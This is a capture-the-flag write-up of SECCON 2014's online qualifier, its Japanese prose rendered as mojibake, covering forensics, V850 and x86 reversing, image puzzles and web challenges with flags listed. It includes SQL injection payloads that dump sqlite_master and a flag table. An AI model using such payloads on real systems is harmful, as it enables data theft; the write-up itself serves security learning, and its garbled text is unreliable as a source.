SECCON 2014 オンライン予é¸(日本語)ã«dodododoã¨ã—ã¦å‚åŠ ã—ãŸã€‚2302点ã§5ä½ã€‚ã¨ã‚Šã‚ãˆãšå…¨å›½å¤§ä¼šã®å‡ºå ´æ¨©ã¯ç²å¾—ã§ããŸ(上ä½8ä½ã¾ã§)。
ãƒãƒ¼ãƒ メンãƒãƒ¼ã«ã‚ˆã‚‹writeup:
以下ã€è‡ªåˆ†ãŒè§£ã„ãŸå•é¡Œã®writeup:
ãƒãƒƒãƒˆãƒ¯ãƒ¼ã‚¯
ソーシャルãƒãƒƒã‚¯ï¼Ÿ
ç”»åƒã¨æ€ã‚れるURL(http://example.com/foo.png)を投ã’ã‚‹ã¨ã‚¢ã‚¯ã‚»ã‚¹ã—ã¦ãれる。
153.120.82.112 - - [19/Jul/2014:12:07:30 +0900] "HEAD /foo.png HTTP/1.1" 404 0 "-" "MyVNCpasswordIsVNCpass123" "153.120.82.124"
VNCã§æŽ¥ç¶šã™ã‚‹ã€‚
FLAG{giveMeYourWebM0n3y}
フォレンジック
879,394bytes
879394→0xd6b22ãªã®ã§ã€ãƒã‚¤ãƒŠãƒªã‚¨ãƒ‡ã‚£ã‚¿ã§\x22\x6b\x0dを検索ã™ã‚‹ã€‚
Chrysanthemum.jpg
æé€ ã•ã‚ŒãŸå¥‘約書を暴ã‘
% binwalk Timestamp.dd DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------------------------------------- 236257 0x39AE1 GIF image data, version "89a", 40 x 40 238130 0x3A232 JPEG image data, EXIF standard 238142 0x3A23E TIFF image data, little-endian 33258102 0x1FB7A76 End of Zip archive 33286656 0x1FBEA00 End of Zip archive 33288192 0x1FBF000 TIFF image data, little-endian 33362132 0x1FD10D4 Copyright string: " (c) 1998 Hewlett-Packard Companyny" 33366016 0x1FD2000 TIFF image data, little-endian 33411072 0x1FDD000 TIFF image data, little-endian 81637443 0x4DDB043 ELF
ã„ãã¤ã‹TIFFç”»åƒã‚ã‚‹ã®ã§ã€åˆ‡ã‚Šå–ã£ã¦ã¿ã¦ã„ã。
33366016 0x1FD2000 TIFF image data, little-endian
ã“ã®TIFFç”»åƒãŒæ©Ÿå¯†ä¿æŒå¥‘約書ã ãŒã€æ—¥ä»˜ã«é–¢ã™ã‚‹æƒ…å ±ã¯ãªã„。ã»ã‹ã®TIFFç”»åƒã‚’見ã¦ã¿ã‚‹ã€‚
238142 0x3A23E TIFF image data, little-endian
binwalkã®æƒ…å ±ãŒé–“é•ã£ã¦ã„ã¦(?)ã€0x3A232ã‹ã‚‰åˆ‡ã‚Šå–ã‚‹ã¨ä¼ŠåŽŸç§€æ˜Žæ°(http://port139.hatenablog.com/)ã®åˆ¤åã®ç”»åƒãŒã‚る。EXIFæƒ…å ±ã«æ›¸ã‹ã‚Œã¦ã„る日付ãŒflag。
% exiftool a.tiff ExifTool Version Number : 9.60 File Name : a.tiff Directory : . File Size : 4.0 kB File Modification Date/Time : 2014:07:20 15:13:04+09:00 File Access Date/Time : 2014:07:20 15:13:56+09:00 File Inode Change Date/Time : 2014:07:20 15:13:04+09:00 File Permissions : rw-r--r-- File Type : JPEG MIME Type : image/jpeg Exif Byte Order : Little-endian (Intel, II) X Resolution : 72 Y Resolution : 72 Resolution Unit : inches Software : F6 Exif Version 0.9.0b Artist : hihara Exif Version : 0210 Date/Time Original : 2012:05:23 13:29:00 Components Configuration : Y, Cb, Cr, - Exif Image Width : 40 Exif Image Height : 40 Compression : JPEG (old-style) Thumbnail Offset : 326 Thumbnail Length : 986 JFIF Version : 1.01 Image Width : 40 Image Height : 40 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 40x40 Thumbnail Image : (Binary data 986 bytes, use -b option to extract)
2012:05:23 13:29:00
ãƒã‚¤ãƒŠãƒª
x86アセンブラをèªã‚‚ã†
my $ret = 0; for my $i (1..0xff) { $ret += $i; } print $ret - 2;
32638
ダンプを追ãˆï¼
dump.binã®ä¸èº«ã‚’見るã¨V850ã¨ã„ã†æ–‡å—列ãŒç´›ã‚Œè¾¼ã‚“ã§ã„る。V850ã¯ãƒžã‚¤ã‚³ãƒ³ã®ä¸€ç¨®ã€‚
V850用ã®binutilsをビルドã—ã¦ãŠã。
% wget https://ftp.gnu.org/gnu/binutils/binutils-2.24.tar.gz % ./configure --target=v850-nec-elf % make
objdumpã—ãŸçµæžœã¨encrypt.nmを照らã—åˆã›ãŸ: https://gist.github.com/akiym/e0703949aa0615cbc1e6
_proc: 146: 03 1e e8 ff addi -24, sp, sp 14a: 20 56 40 00 movea 64, r0, r10 14e: 40 3e 00 00 movhi 0, r0, r7 152: 63 ff 15 00 st.w lp, 20[sp] 156: 63 57 11 00 st.w r10, 16[sp] 15a: 27 3e 3c 16 movea 5692, r7, r7 ; _etext section 15e: 03 46 10 00 addi 16, sp, r8 162: bf ff 88 ff jarl 0xea, lp ; _read_data 166: 23 77 11 00 ld.w 16[sp], r14 16a: ca 66 ff 00 andi 255, r10, r12 16e: 00 6a mov 0, r13 170: 95 15 br 0x192 172: 40 56 00 00 movhi 0, r0, r10 176: 2a 56 3c 16 movea 5692, r10, r10 ; _etext section 17a: cd 51 add r13, r10 17c: 0a 5f 00 00 ld.b 0[r10], r11 180: 41 6a add 1, r13 182: 2c 59 xor r12, r11 184: cc 61 add r12, r12 186: 0c 66 11 00 addi 17, r12, r12 18a: 4a 5f 00 00 st.b r11, 0[r10] 18e: cc 66 ff 00 andi 255, r12, r12 192: ee 69 cmp r14, r13 194: f6 ed blt 0x172 196: 23 ff 15 00 ld.w 20[sp], lp 19a: 03 1e 18 00 addi 24, sp, sp 19e: 7f 00 jmp [lp]
my @etext = (0x63, 0x17, 0x86, 0xD8, 0x34, 0xF9, 0x06, 0x8C, 0x9B, 0x80, 0x9D, 0x96, 0xD7, 0xDA, 0xDF, 0x92); my $r12 = 37; for my $c (@etext) { print chr($c ^ $r12); $r12 += $r12; $r12 += 17; $r12 &= 0xff; }
r12ã®åˆæœŸå€¤ã¯_procを見るã ã‘ã§ã¯ã‚ã‹ã‚‰ãªã„。é¢å€’ã ã£ãŸã®ã§flagã®ãƒ•ã‚©ãƒ¼ãƒžãƒƒãƒˆãŒFLAG{...}ã§ã‚ã‚‹ãŸã‚ã€0x63 ^ ord('F')ãŒr12ã®åˆæœŸå€¤ã ã¨æŽ¨æ¸¬ã—ãŸã€‚
FLAG{Victory850}
プãƒã‚°ãƒ©ãƒŸãƒ³ã‚°
é‡ãã¦ã¿ã‚ˆã†
GIFアニメ画åƒã‚’分解
% convert +adjoin in.gif out.gif
白黒å転ã•ã›ã¦ã€ç™½ã‚’é€éŽè‰²ã«ã™ã‚‹ã€‚
% convert -negate in.gif out.gif % convert -transparent white in.gif out.gif
ç”»åƒã‚’é‡ãる。
% convert in1.gif in2.gif -composite out.gif
ã‚ã¨ã¯ã‚¹ã‚¯ãƒªãƒ—トã«è½ã¨ã—ã¦ã€49æžšã®ç”»åƒã«å¯¾ã—ã¦å‡¦ç†ã‚’ã™ã‚‹ã€‚生æˆã•ã‚ŒãŸç”»åƒã¯QRCodeã«ãªã£ã¦ã„ã‚‹ã®ã§ã€èªã¿å–る。
FLAG{Many dot makes a QR code}
ã‚ã¿ã ãã˜
https://gist.github.com/akiym/335ae9083687d2169caf
pwntoolsã¨ã„ã†ãƒ©ã‚¤ãƒ–ラリを使ã£ã¦ã„ã‚‹ã®ã§ã€å®Ÿéš›ã«å‹•ä½œã•ã›ã‚‹ã¨ãã«ã¯æ³¨æ„。
ã‚ã¿ã ãã˜ã‚’解ãã¨æ¯Žå›žsleepã™ã‚‹ã®ã§ã€1000回解ãã«ã¯è‡ªå‹•ã§è§£ã„ã¦ã‚‚å°‘ã—時間ãŒã‹ã‹ã‚‹ã€‚ã“ã®å•é¡Œã¯x64ãƒã‚¤ãƒŠãƒªã§static linkã•ã‚Œã¦ã„ã‚‹ã®ã§sleepã‚’æ½°ã™ã«ã¯ãƒã‚¤ãƒŠãƒªã®ä¸ã®nanosleepã®syscallã‚’æ½°ã›ã°è‰¯ã„。
47ff39: b8 23 00 00 00 mov eax,0x23 47ff3e: 0f 05 syscall 47ff40: 48 3d 01 f0 ff ff cmp rax,0xfffffffffffff001 47ff46: 0f 83 e4 41 fd ff jae 0x454130 47ff4c: c3 ret 47ff4d: 48 83 ec 08 sub rsp,0x8 47ff51: e8 4a 27 fd ff call 0x4526a0 47ff56: 48 89 04 24 mov QWORD PTR [rsp],rax 47ff5a: b8 23 00 00 00 mov eax,0x23 47ff5f: 0f 05 syscall
ã“ã‚Œã§5秒ãらã„ã§è§£ã‘るよã†ã«ãªã‚‹ã€‚
FLAG{c4693af1761200417d5645bd084e28f0f2b426bf}
Web
ç®±åºSQLiãƒãƒ£ãƒ¬ãƒ³ã‚¸
スタンダードãªSQLiå•é¡Œã€‚考ãˆã‚‹å¿…è¦ãŒãªã„。
'or'1 'union select group_concat(sql),1,1,1,1 from sqlite_master-- 'union select flag,1,1,1,1 from seccon--
FLAG{EnjoySQLi}
ç®±åºXSSリターンズ
メンãƒãƒ¼ã®lmt_swallowã«ã‚ˆã‚‹SECCON 2013 オンライン予é¸ã®ç®±åºXSS Finalã®writeupã‚’å‚考ã«ã—ãŸ: https://gist.github.com/lmt-swallow/03170ca9c079e2ea555a
ã»ã¨ã‚“ã©å‰å›žã¨åŒã˜ã‚ˆã†ã«è§£ã‘ã‚‹ãŒã€ä»Šå›žã¯20回XSSã•ã›ãªã„ã¨ã„ã‘ãªã„ã®ã§ã€å°‘ã—工夫ã—ã¦è§£ãå¿…è¦ãŒã‚ã£ãŸã€‚
https://gist.github.com/akiym/9c9f903d824fddcaf2c8
FLAG{dbe6Z7bdbpa3e7cdcccc5c0}(途ä¸ç‚¹)
FLAG{OO3auUR7e8712af065dBa6F}
